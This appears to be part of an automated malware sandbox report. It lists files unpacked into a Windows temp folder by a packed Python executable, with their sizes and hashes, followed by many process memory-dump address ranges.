                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\frozenlist\_frozenlist.pyd
                                                                                                            Filesize

                                                                                                            84KB

                                                                                                            MD5

                                                                                                            911470750962640ceb3fd11e2aeecd14

                                                                                                            SHA1

                                                                                                            af797451d4028841d92f771885cb9d81afba3f96

                                                                                                            SHA256

                                                                                                            5c204f6966526af4dc0c0d6d29909b6f088c4fa781464f2948414d833b03094d

                                                                                                            SHA512

                                                                                                            637043c20dc17fbc472613c0e4f576f0a2211b7916b3488806aec30271cf1bd84bd790518335b88910662fd4844f8ed39fa75aa278577271a966756b8cd793f7

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\libssl-1_1.dll
                                                                                                            Filesize

                                                                                                            682KB

                                                                                                            MD5

                                                                                                            de72697933d7673279fb85fd48d1a4dd

                                                                                                            SHA1

                                                                                                            085fd4c6fb6d89ffcc9b2741947b74f0766fc383

                                                                                                            SHA256

                                                                                                            ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f

                                                                                                            SHA512

                                                                                                            0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\multidict\_multidict.pyd
                                                                                                            Filesize

                                                                                                            45KB

                                                                                                            MD5

                                                                                                            ddd4c0ae1e0d166c22449e9dcdca20d7

                                                                                                            SHA1

                                                                                                            ff0e3d889b4e8bc43b0f13aa1154776b0df95700

                                                                                                            SHA256

                                                                                                            74ec52418c5d38a63add94228c6f68cf49519666ae8bcb7ac199f7d539d8612c

                                                                                                            SHA512

                                                                                                            c8464a77ba8b504ba9c7873f76499174095393c42dc85a9c1be2875c3661cda928851e37013e4ac95ba539eed984bf71c0fcc2cb599f3f0c4c1588d4a692bdfd

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\python3.dll
                                                                                                            Filesize

                                                                                                            63KB

                                                                                                            MD5

                                                                                                            07bd9f1e651ad2409fd0b7d706be6071

                                                                                                            SHA1

                                                                                                            dfeb2221527474a681d6d8b16a5c378847c59d33

                                                                                                            SHA256

                                                                                                            5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5

                                                                                                            SHA512

                                                                                                            def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\python310.dll
                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                            MD5

                                                                                                            c80b5cb43e5fe7948c3562c1fff1254e

                                                                                                            SHA1

                                                                                                            f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                                                                                                            SHA256

                                                                                                            058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                                                                                                            SHA512

                                                                                                            faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\select.pyd
                                                                                                            Filesize

                                                                                                            28KB

                                                                                                            MD5

                                                                                                            adc412384b7e1254d11e62e451def8e9

                                                                                                            SHA1

                                                                                                            04e6dff4a65234406b9bc9d9f2dcfe8e30481829

                                                                                                            SHA256

                                                                                                            68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1

                                                                                                            SHA512

                                                                                                            f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\stub.exe
                                                                                                            Filesize

                                                                                                            17.9MB

                                                                                                            MD5

                                                                                                            5ad46542eebe9910891770d619d7c4fa

                                                                                                            SHA1

                                                                                                            38b3d062740d4a350c3329f4e5d7627e4a980ef3

                                                                                                            SHA256

                                                                                                            6b0281ff5ec47dfabd801ecde7e55513e556ca6763a557bfb8f2c07b0e739bd5

                                                                                                            SHA512

                                                                                                            426aa5a0453dc0ad2494d43fdfa7d6c35f19770026650db413234859c34e9a1371272942e96d8741594a47832c4fb4391c217911bc65c6434d621f01995d1e64

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\unicodedata.pyd
                                                                                                            Filesize

                                                                                                            1.1MB

                                                                                                            MD5

                                                                                                            102bbbb1f33ce7c007aac08fe0a1a97e

                                                                                                            SHA1

                                                                                                            9a8601bea3e7d4c2fa6394611611cda4fc76e219

                                                                                                            SHA256

                                                                                                            2cf6c5dea30bb0584991b2065c052c22d258b6e15384447dcea193fdcac5f758

                                                                                                            SHA512

                                                                                                            a07731f314e73f7a9ea73576a89ccb8a0e55e53f9b5b82f53121b97b1814d905b17a2da9bd2eda9f9354fc3f15e3dea7a613d7c9bc98c36bba653743b24dfc32

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\onefile_5056_133611366242670364\yarl\_quoting_c.pyd
                                                                                                            Filesize

                                                                                                            93KB

                                                                                                            MD5

                                                                                                            8b4cd87707f15f838b5db8ed5b5021d2

                                                                                                            SHA1

                                                                                                            bbc05580a181e1c03e0a53760c1559dc99b746fe

                                                                                                            SHA256

                                                                                                            eefb46501ef97baf29a93304f58674e70f5ccecafb183f230e5ce7872a852f56

                                                                                                            SHA512

                                                                                                            6768cff12fa22fe8540a3f6bdb350a5fcec0b2a0f01531458eb23f77b24460620cd400078fd1ec63738884c2b78920e428126833953c26b8dc8ad8b7c069415d

                                                                                                          • memory/636-352-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                            Filesize

                                                                                                            340KB

                                                                                                          • memory/636-350-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                            Filesize

                                                                                                            340KB

                                                                                                          • memory/640-17-0x0000000000970000-0x0000000000E3B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/640-5-0x0000000000970000-0x0000000000E3B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/640-3-0x0000000000970000-0x0000000000E3B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/640-2-0x0000000000971000-0x000000000099F000-memory.dmp
                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/640-1-0x0000000077CE4000-0x0000000077CE6000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/640-0-0x0000000000970000-0x0000000000E3B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/744-370-0x0000000000F20000-0x0000000000F21000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/1756-568-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-566-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-563-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-562-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-569-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-561-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-558-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-571-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-567-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-565-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-560-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-570-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-557-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1756-559-0x0000000140000000-0x0000000140848000-memory.dmp
                                                                                                            Filesize

                                                                                                            8.3MB

                                                                                                          • memory/1996-371-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.2MB

                                                                                                          • memory/1996-413-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                                                                                            Filesize

                                                                                                            972KB

                                                                                                          • memory/1996-369-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.2MB

                                                                                                          • memory/2204-351-0x0000000001390000-0x0000000001391000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/3088-500-0x000001BE97940000-0x000001BE97960000-memory.dmp
                                                                                                            Filesize

                                                                                                            128KB

                                                                                                          • memory/3116-281-0x0000000006D80000-0x0000000006D92000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/3116-291-0x0000000006F50000-0x0000000006F9C000-memory.dmp
                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/3116-248-0x0000000000BD0000-0x0000000000C22000-memory.dmp
                                                                                                            Filesize

                                                                                                            328KB

                                                                                                          • memory/3116-253-0x0000000005B60000-0x0000000006104000-memory.dmp
                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/3116-254-0x00000000054E0000-0x0000000005572000-memory.dmp
                                                                                                            Filesize

                                                                                                            584KB

                                                                                                          • memory/3116-380-0x0000000007090000-0x00000000070F6000-memory.dmp
                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/3116-257-0x00000000056A0000-0x00000000056AA000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3116-275-0x0000000006290000-0x0000000006306000-memory.dmp
                                                                                                            Filesize

                                                                                                            472KB

                                                                                                          • memory/3116-276-0x0000000006BB0000-0x0000000006BCE000-memory.dmp
                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/3116-279-0x00000000072F0000-0x0000000007908000-memory.dmp
                                                                                                            Filesize

                                                                                                            6.1MB

                                                                                                          • memory/3116-280-0x0000000006E40000-0x0000000006F4A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/3116-453-0x0000000008750000-0x00000000087A0000-memory.dmp
                                                                                                            Filesize

                                                                                                            320KB

                                                                                                          • memory/3116-457-0x0000000007F70000-0x0000000008132000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.8MB

                                                                                                          • memory/3116-458-0x0000000008ED0000-0x00000000093FC000-memory.dmp
                                                                                                            Filesize

                                                                                                            5.2MB

                                                                                                          • memory/3116-282-0x0000000006DE0000-0x0000000006E1C000-memory.dmp
                                                                                                            Filesize

                                                                                                            240KB

                                                                                                          • memory/3224-543-0x000002D1B80D0000-0x000002D1B80EA000-memory.dmp
                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/3224-542-0x000002D1B8070000-0x000002D1B807A000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3224-546-0x000002D1B80C0000-0x000002D1B80CA000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3224-545-0x000002D1B80B0000-0x000002D1B80B6000-memory.dmp
                                                                                                            Filesize

                                                                                                            24KB

                                                                                                          • memory/3224-544-0x000002D1B8080000-0x000002D1B8088000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/3224-539-0x000002D1B7E60000-0x000002D1B7F15000-memory.dmp
                                                                                                            Filesize

                                                                                                            724KB

                                                                                                          • memory/3224-538-0x000002D1B7E40000-0x000002D1B7E5C000-memory.dmp
                                                                                                            Filesize

                                                                                                            112KB

                                                                                                          • memory/3224-540-0x000002D1B7F20000-0x000002D1B7F2A000-memory.dmp
                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/3224-541-0x000002D1B8090000-0x000002D1B80AC000-memory.dmp
                                                                                                            Filesize

                                                                                                            112KB

                                                                                                          • memory/3596-299-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/3596-297-0x00000000006C0000-0x00000000006C1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/3656-449-0x00007FF798C40000-0x00007FF799E75000-memory.dmp
                                                                                                            Filesize

                                                                                                            18.2MB

                                                                                                          • memory/3656-468-0x00007FF798C40000-0x00007FF799E75000-memory.dmp
                                                                                                            Filesize

                                                                                                            18.2MB

                                                                                                          • memory/3912-551-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3912-549-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3912-553-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3912-552-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3912-550-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3912-556-0x0000000140000000-0x000000014000E000-memory.dmp
                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/3924-298-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                            Filesize

                                                                                                            340KB

                                                                                                          • memory/3924-300-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                            Filesize

                                                                                                            340KB

                                                                                                          • memory/3952-507-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/3952-505-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4380-582-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4380-580-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4580-251-0x0000026B5D640000-0x0000026B5D688000-memory.dmp
                                                                                                            Filesize

                                                                                                            288KB

                                                                                                          • memory/4580-252-0x0000026B5D690000-0x0000026B5D8AC000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.1MB

                                                                                                          • memory/4580-231-0x0000026B5DA10000-0x0000026B5DA32000-memory.dmp
                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/4860-18-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-572-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-20-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-255-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-19-0x0000000000381000-0x00000000003AF000-memory.dmp
                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/4860-517-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-496-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-504-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-365-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-495-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-21-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-573-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-574-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/4860-575-0x0000000000380000-0x000000000084B000-memory.dmp
                                                                                                            Filesize

                                                                                                            4.8MB

                                                                                                          • memory/5056-366-0x00007FF79F8E0000-0x00007FF7A03B5000-memory.dmp
                                                                                                            Filesize

                                                                                                            10.8MB

                                                                                                          • memory/5056-472-0x00007FF79F8E0000-0x00007FF7A03B5000-memory.dmp
                                                                                                            Filesize

                                                                                                            10.8MB